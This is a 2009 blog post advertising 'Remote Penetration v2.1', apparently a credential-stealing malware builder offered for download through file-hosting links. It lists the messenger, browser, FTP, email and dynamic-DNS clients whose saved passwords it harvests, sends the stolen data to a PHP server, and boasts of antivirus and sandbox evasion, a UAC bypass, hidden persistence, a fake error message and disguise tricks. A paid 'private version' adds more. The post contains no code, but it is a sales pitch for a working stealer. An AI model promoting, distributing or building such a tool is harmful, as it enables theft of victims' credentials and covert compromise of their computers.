Friday, August 14, 2009

Remote Penetration v2.1



PHP Login/Logs Screenshot:

http://sites.google.com/site/server2...tlogviewer.gif


Recovery:

* Trillian
* Pidgin and Gaim
* PaltalkScene
* Digsby
* Live Messenger
* MSN Messenger
* AIM 6.xx (Private Version only)
* Miranda (Private Version only)
* Google Talk (Private Version only)(NEW)
* Firefox 2.xx - 3.xx
* IE6
* IE7 - 8
* Filezilla
* Smart FTP
* FlashFXP
* CoreFTP
* NO-IP
* DynDNS
* Outlook
* CamFrog (NEW)
* Custom CD-Key Grabber (Input own path to key you want to grab)

Icon Options:

* Replace Default Icon:
* Icon Hunter

Main Features:

* Stub / Builder made in VB6
* FUD Scantime + Runtime
* All strings are encrypted, all your inputted data, (PHP url) is encrypted, and all API's that can be encrypted/called dynamically are encrypted.
* No 3rd party applications used
* UAC Bypass
* output.exe = 96kb uncompressed, 37.7kb compressed(NEW)
* Send info via PHP (MySQL setup)(NEW)
* Output.exe requires NO dependencies. (Builder does though) (NEW)
* Ability to import FUD stubs
* Anti-Generic Sandbox
* Anti-Virtual PC, VMWare, VirtualBox
* Installation options (You get the option to pick where the file drops to / where in the registry to add the startup key.)
* Pick the dropped files attributes (Hidden, Read only, or System)
* Option to compress with UPX
* Scramble the UPX header
* Added File Version Info Cloner (NEW)
* Fake error message
* Change the Date of the outputted executable's date
* Increase the files size (Add NOP bytes to the file)
* Load and Save your sessions!

Private Version:

* All of the listed features above + a unique stub that no one else has.
* AIM 6.xx recovery
* Miranda recovery
* Google Talk recovery
* Melt
* Option on builder to delete, output.exe, icon. (save kbs)
* No set number of CD-Key Paths (You can add as many keys as you want grabbed)


http://rapidshare.com/files/26715254...on21mirror.zip
or
http://rapidshare.com/files/26714934...etration21.zip
or
http://www.mediafire.com/?1y0min5d3rj
or
http://www.megaupload.com/?d=KTLMT40T

0 comments:

Post a Comment